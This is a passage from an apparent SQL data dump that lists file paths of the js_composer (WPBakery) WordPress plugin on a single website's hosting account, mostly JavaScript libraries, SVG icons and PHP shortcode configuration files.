p-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/tooltip.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/tooltip.min.js'),(1092,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/transition.min.js','wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/transition.min.js'),(1093,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/chartjs/Chart.min.js','wp-content/plugins/js_composer/assets/lib/bower/chartjs/Chart.min.js'),(1094,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/flexslider/fonts/flexslider-icon.svg','wp-content/plugins/js_composer/assets/lib/bower/flexslider/fonts/flexslider-icon.svg'),(1095,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/flexslider/jquery.flexslider-min.js','wp-content/plugins/js_composer/assets/lib/bower/flexslider/jquery.flexslider-min.js'),(1096,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-brands-400.svg','wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-brands-400.svg'),(1097,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-regular-400.svg','wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-regular-400.svg'),(1098,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-solid-900.svg','wp-content/plugins/js_composer/assets/lib/bower/font-awesome/webfonts/fa-solid-900.svg'),(1099,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/imagesloaded/imagesloaded.pkgd.min.js','wp-content/plugins/js_composer/assets/lib/bower/imagesloaded/imagesloaded.pkgd.min.js'),(1100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js','wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js'),(1101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/jquery-ui-tabs-rotate/jquery-ui-tabs-rotate.min.js','wp-content/plugins/js_composer/assets/lib/bower/jquery-ui-tabs-rotate/jquery-ui-tabs-rotate.min.js'),(1102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/json-js/json2.min.js','wp-content/plugins/js_composer/assets/lib/bower/json-js/json2.min.js'),(1103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/lessjs/dist/less.min.js','wp-content/plugins/js_composer/assets/lib/bower/lessjs/dist/less.min.js'),(1104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/masonry/dist/masonry.pkgd.min.js','wp-content/plugins/js_composer/assets/lib/bower/masonry/dist/masonry.pkgd.min.js'),(1105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/nivoslider/jquery.nivo.slider.pack.js','wp-content/plugins/js_composer/assets/lib/bower/nivoslider/jquery.nivo.slider.pack.js'),(1106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/progress-circle/ProgressCircle.min.js','wp-content/plugins/js_composer/assets/lib/bower/progress-circle/ProgressCircle.min.js'),(1107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/scrollTo/jquery.scrollTo.min.js','wp-content/plugins/js_composer/assets/lib/bower/scrollTo/jquery.scrollTo.min.js'),(1108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/skrollr/dist/skrollr.min.js','wp-content/plugins/js_composer/assets/lib/bower/skrollr/dist/skrollr.min.js'),(1109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/twbs-pagination/jquery.twbsPagination.min.js','wp-content/plugins/js_composer/assets/lib/bower/twbs-pagination/jquery.twbsPagination.min.js'),(1110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/vcIconPicker/jquery.fonticonpicker.min.js','wp-content/plugins/js_composer/assets/lib/bower/vcIconPicker/jquery.fonticonpicker.min.js'),(1111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/bower/zoom/jquery.zoom.min.js','wp-content/plugins/js_composer/assets/lib/bower/zoom/jquery.zoom.min.js'),(1112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/owl.carousel.min.js','wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/owl.carousel.min.js'),(1113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/php.default/php.default.min.js','wp-content/plugins/js_composer/assets/lib/php.default/php.default.min.js'),(1114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js','wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js'),(1115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc-tta-autoplay/vc-tta-autoplay.min.js','wp-content/plugins/js_composer/assets/lib/vc-tta-autoplay/vc-tta-autoplay.min.js'),(1116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_accordion/vc-accordion.min.js','wp-content/plugins/js_composer/assets/lib/vc_accordion/vc-accordion.min.js'),(1117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_carousel/fonts/glyphicons-halflings-regular.svg','wp-content/plugins/js_composer/assets/lib/vc_carousel/fonts/glyphicons-halflings-regular.svg'),(1118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_carousel/js/transition.min.js','wp-content/plugins/js_composer/assets/lib/vc_carousel/js/transition.min.js'),(1119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_carousel/js/vc_carousel.min.js','wp-content/plugins/js_composer/assets/lib/vc_carousel/js/vc_carousel.min.js'),(1120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_chart/jquery.vc_chart.min.js','wp-content/plugins/js_composer/assets/lib/vc_chart/jquery.vc_chart.min.js'),(1121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_image_zoom/vc_image_zoom.min.js','wp-content/plugins/js_composer/assets/lib/vc_image_zoom/vc_image_zoom.min.js'),(1122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_line_chart/vc_line_chart.min.js','wp-content/plugins/js_composer/assets/lib/vc_line_chart/vc_line_chart.min.js'),(1123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_round_chart/vc_round_chart.min.js','wp-content/plugins/js_composer/assets/lib/vc_round_chart/vc_round_chart.min.js'),(1124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_tabs/vc-tabs.min.js','wp-content/plugins/js_composer/assets/lib/vc_tabs/vc-tabs.min.js'),(1125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/lib/vc_waypoints/vc-waypoints.min.js','wp-content/plugins/js_composer/assets/lib/vc_waypoints/vc-waypoints.min.js'),(1126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/blur.svg','wp-content/plugins/js_composer/assets/vc/blur.svg'),(1127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/loaders/spinner-light.svg','wp-content/plugins/js_composer/assets/vc/loaders/spinner-light.svg'),(1128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/loaders/spinner.svg','wp-content/plugins/js_composer/assets/vc/loaders/spinner.svg'),(1129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/logo/wpb-logo-white.svg','wp-content/plugins/js_composer/assets/vc/logo/wpb-logo-white.svg'),(1130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/logo/wpb-logo-white_32.svg','wp-content/plugins/js_composer/assets/vc/logo/wpb-logo-white_32.svg'),(1131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/logo/wpb-logo.svg','wp-content/plugins/js_composer/assets/vc/logo/wpb-logo.svg'),(1132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-accordion.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-accordion.svg'),(1133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-acf.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-acf.svg'),(1134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-button.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-button.svg'),(1135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-category.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-category.svg'),(1136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-contact-form-7.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-contact-form-7.svg'),(1137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-cta.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-cta.svg'),(1138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-custom-fields.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-custom-fields.svg'),(1139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-doughnut-chart.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-doughnut-chart.svg'),(1140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-empty-space.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-empty-space.svg'),(1141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-excerpt.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-excerpt.svg'),(1142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-facebook.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-facebook.svg'),(1143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-faq-toggle.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-faq-toggle.svg'),(1144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-flickr.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-flickr.svg'),(1145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-fonts.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-fonts.svg'),(1146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-maps.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-maps.svg'),(1147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-plus.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-plus.svg'),(1148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gravity-forms.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gravity-forms.svg'),(1149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gutenberg.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gutenberg.svg'),(1150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-hover-box.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-hover-box.svg'),(1151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-icon.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-icon.svg'),(1152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-carousel.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-carousel.svg'),(1153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-gallery.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-gallery.svg'),(1154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-layer-slider.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-layer-slider.svg'),(1155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-line-chart.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-line-chart.svg'),(1156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-media-grid.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-media-grid.svg'),(1157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-media-masonry-grid.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-media-masonry-grid.svg'),(1158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-message-box.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-message-box.svg'),(1159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-misc.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-misc.svg'),(1160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-my-shortcode.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-my-shortcode.svg'),(1161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-ninja-forms.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-ninja-forms.svg'),(1162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pageable-container.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pageable-container.svg'),(1163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pie-chart.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pie-chart.svg'),(1164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pinterest.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pinterest.svg'),(1165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-author.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-author.svg'),(1166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-date.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-date.svg'),(1167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-grid.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-grid.svg'),(1168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-masonry-grid.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-masonry-grid.svg'),(1169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-title.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-title.svg'),(1170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider-2.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider-2.svg'),(1171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider.svg'),(1172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-progress-bar.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-progress-bar.svg'),(1173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-html.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-html.svg'),(1174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-js.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-js.svg'),(1175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-revolution-slider.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-revolution-slider.svg'),(1176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-row.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-row.svg'),(1177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-section.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-section.svg'),(1178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-with-text.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-with-text.svg'),(1179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-zig-zag.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-zig-zag.svg'),(1180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator.svg'),(1181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-single-image.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-single-image.svg'),(1182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tabs.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tabs.svg'),(1183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-text-block.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-text-block.svg'),(1184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tour.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tour.svg'),(1185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-twitter.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-twitter.svg'),(1186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-vc-logo.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-vc-logo.svg'),(1187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-video.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-video.svg'),(1188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-widget-sidebar.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-widget-sidebar.svg'),(1189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-woo-commerce.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-woo-commerce.svg'),(1190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-wordpress.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-wordpress.svg'),(1191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-wpb-logo.svg','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-wpb-logo.svg'),(1192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/buttons/shortcode-vc-btn.php','wp-content/plugins/js_composer/config/buttons/shortcode-vc-btn.php'),(1193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/buttons/shortcode-vc-cta.php','wp-content/plugins/js_composer/config/buttons/shortcode-vc-cta.php'),(1194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-column-inner.php','wp-content/plugins/js_composer/config/containers/shortcode-vc-column-inner.php'),(1195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-column.php','wp-content/plugins/js_composer/config/containers/shortcode-vc-column.php'),(1196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-row-inner.php','wp-content/plugins/js_composer/config/containers/shortcode-vc-row-inner.php'),(1197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-row.php','wp-content/plugins/js_composer/config/containers/shortcode-vc-row.php'),(1198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-section.php','wp-content/plugins/js_composer/config/containers/shortcode-vc-section.php'),(1199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-column-text.php','wp-content/plugins/js_composer/config/content/shortcode-vc-column-text.php'),(1200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-custom-heading.php','wp-content/plugins/js_composer/config/content/shortcode-vc-custom-heading.php'),(1201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-empty-space.php','wp-content/plugins/js_composer/config/content/shortcode-vc-empty-space.php'),(1202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-flickr.php','wp-content/plugins/js_composer/config/content/shortcode-vc-flickr.php'),(1203,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-gallery.php','wp-content/plugins/js_composer/config/content/shortcode-vc-gallery.php'),(1204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-gmaps.php','wp-content/plugins/js_composer/config/content/shortcode-vc-gmaps.php'),(1205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-hoverbox.php','wp-content/plugins/js_composer/config/content/shortcode-vc-hoverbox.php'),(1206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-icon.php','wp-content/plugins/js_composer/config/content/shortcode-vc-icon.php'),(1207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-images-carousel.php','wp-content/plugins/js_composer/config/content/shortcode-vc-images-carousel.php'),(1208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-line-chart.php','wp-content/plugins/js_composer/config/content/shortcode-vc-line-chart.php'),(1209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-message.php','wp-content/plugins/js_composer/config/content/shortcode-vc-message.php'),(1210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-pie.php','wp-content/plugins/js_composer/config/content/shortcode-vc-pie.php'),(1211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-posts-slider.php','wp-content/plugins/js_composer/config/content/shortcode-vc-posts-slider.php'),(1212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-progress-bar.php','wp-content/plugins/js_composer/config/content/shortcode-vc-progress-bar.php'),(1213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-round-chart.php','wp-content/plugins/js_composer/config/content/shortcode-vc-round-chart.php'),(1214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-separator.php','wp-content/plugins/js_composer/config/content/shortcode-vc-separator.php'),(1215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-single-image.php','wp-content/plugins/js_composer/config/content/shortcode-vc-single-image.php'),(1216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-text-separator.php','wp-content/plugins/js_composer/config/content/shortcode-vc-text-separator.php'),(1217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-toggle.php','wp-content/plugins/js_composer/config/content/shortcode-vc-toggle.php'),(1218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-video.php','wp-content/plugins/js_composer/config/content/shortcode-vc-video.php'),(1219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-zigzag.php','wp-content/plugins/js_composer/config/content/shortcode-vc-zigzag.php'),(1220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/vc-custom-heading-element.php','wp-content/plugins/js_composer/config/content/vc-custom-heading-element.php'),(1221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/vc-icon-element.php','wp-content/plugins/js_composer/config/content/vc-icon-element.php'),(1222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion-tab.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion-tab.php'),(1223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion.php'),(1224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button.php'),(1225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button2.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button2.php'),(1226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button.php'),(1227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button2.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button2.php'),(1228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-googleplus.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-googleplus.php'),(1229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tab.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tab.php'),(1230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tabs.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tabs.php'),(1231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tour.php','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tour.php'),(1232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/grids/class-vc-grids-common.php','wp-content/plugins/js_composer/config/grids/class-vc-grids-common.php'),(1233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/grids/shortcode-vc-basic-grid.php','wp-content/plugins/js_composer/config/grids/shortcode-vc-basic-grid.php'),(1234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-grid.php','wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-grid.php'),(1235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-media-grid.php','wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-media-grid.php'),(1236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/grids/shortcode-vc-media-grid.php','wp-content/plugins/js_composer/config/grids/shortcode-vc-media-grid.php'),(1237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/grids/vc-grids-functions.php','wp-content/plugins/js_composer/config/grids/vc-grids-functions.php'),(1238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/lean-map.php